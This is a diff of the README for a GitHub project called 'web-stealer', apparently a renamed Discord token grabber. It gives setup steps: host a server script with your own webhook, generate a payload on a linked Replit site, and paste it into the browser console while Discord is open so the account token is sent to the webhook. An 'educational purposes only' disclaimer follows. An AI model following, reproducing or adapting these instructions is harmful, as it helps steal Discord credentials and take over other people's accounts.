I-Skid/web-stealer/README.md

 ## Setup

-1. Upload the [`server.py`](https://github.com/I-Skid/discord-web-token-grabber/blob/main/server.py) script to a hosting service like [Replit](https://replit.com/) or your preferred hosting service.
+1. Upload the [`server.py`](https://github.com/I-Skid/web-stealer/blob/main/server.py) script to a hosting service such as [Replit](https://replit.com/) or your preferred hosting platform.
-2. Replace [`YOUR WEBHOOK`](https://github.com/I-Skid/discord-web-token-grabber/blob/main/server.py#L6) in [`server.py`](https://github.com/I-Skid/discord-web-token-grabber/blob/main/server.py) with your desired webhook.
+2. Replace [`YOUR WEBHOOK`](https://github.com/I-Skid/web-stealer/blob/main/server.py#L6) in [`server.py`](https://github.com/I-Skid/web-stealer/blob/main/server.py) with your desired webhook URL.
-3. Start the hosting service and copy the URL of [`server.py`](https://github.com/I-Skid/discord-web-token-grabber/blob/main/server.py).
+3. Start the hosting service and copy the URL where [`server.py`](https://github.com/I-Skid/web-stealer/blob/main/server.py) is hosted.
-4. Visit [this website](https://web-stealer.yuvi5000.repl.co/), select the payload, and enter the URL of [`server.py`](https://github.com/I-Skid/discord-web-token-grabber/blob/main/server.py).
+4. Visit [this website](https://web-stealer.yuvi5000.repl.co/), select the payload, and enter the URL of your hosted [`server.py`](https://github.com/I-Skid/web-stealer/blob/main/server.py).
-5. Copy the generated payload and paste it into the browser console with Discord open.
+5. Copy the generated payload and paste it into the browser console while Discord is open.
 The token will be sent to the specified webhook.

 ## Important

-This program is for educational purposes only.
-I am not liable for any damage caused by this software.
+This program is intended for educational purposes only.
+I am not liable for any damage caused by the use of this software.

 ## Encountering Errors?